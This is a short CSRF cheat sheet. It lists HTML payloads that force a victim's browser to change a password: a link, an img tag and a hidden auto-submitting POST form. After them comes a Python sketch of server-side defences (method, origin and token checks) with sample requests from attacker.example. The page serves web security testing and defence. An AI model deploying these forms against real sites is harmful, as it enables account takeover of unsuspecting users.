CSRF (Cross-Site Request Forgery)

Payloads

GET

<!-- Requires user interaction -->
<a href="http://10.10.10.10/changepasswd.php?pass=pass">Click Me</a>

<!-- No user interaction required -->
<img src="http://10.10.10.10/changepasswd.php?pass=pass">

POST

<form id="form" action="http://<host>/changepasswd.php" method="POST">
 <input name="pass" type="hidden" value="pass" />
 <input type="submit" value="Submit" />
</form>

<!-- Auto submit -->
<script>
 document.getElementById("form").submit();
</script>
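
Added example, not from the original page: a framework-agnostic Python sketch of the server-side check that rejects each payload above (state change over GET, cross-origin POST, POST without a token). The function names, the `csrf_token` form field and the trusted origin value are assumptions for illustration, and the sample requests are constructed.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the application's own origin (the page only gives 10.10.10.10 as host).
TRUSTED_ORIGIN = "http://10.10.10.10"


def same_origin(headers):
    """Compare Origin (Referer as fallback) with the trusted origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # strict choice: no provenance header, no state change
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def allow_password_change(method, headers, form, session_token):
    """Return (allowed, reason) for a request to the password-change endpoint."""
    if method != "POST":
        return False, "state change over non-POST method"
    if not same_origin(headers):
        return False, "cross-origin or missing Origin/Referer"
    supplied = form.get("csrf_token", "")
    # Constant-time comparison against the token stored in the user's session.
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed requests mirroring the payloads on this page, plus a legitimate one.
SESSION_TOKEN = secrets.token_urlsafe(32)  # per-session, embedded in the real form
SAMPLES = {
    "img/link GET": ("GET", {"Referer": "http://attacker.example/"}, {"pass": "pass"}),
    "auto-submit POST": ("POST", {"Origin": "http://attacker.example"}, {"pass": "pass"}),
    "same-origin POST, no token": ("POST", {"Origin": TRUSTED_ORIGIN}, {"pass": "pass"}),
    "legitimate form": ("POST", {"Origin": TRUSTED_ORIGIN},
                        {"pass": "pass", "csrf_token": SESSION_TOKEN}),
}


def evaluate_samples():
    return {name: allow_password_change(m, h, f, SESSION_TOKEN)
            for name, (m, h, f) in SAMPLES.items()}


if __name__ == "__main__":
    for name, (ok, reason) in evaluate_samples().items():
        print(f"{name:28} allowed={ok} ({reason})")
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a browser-side layer, but the server-side check should not depend on it.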

References

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection
https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery
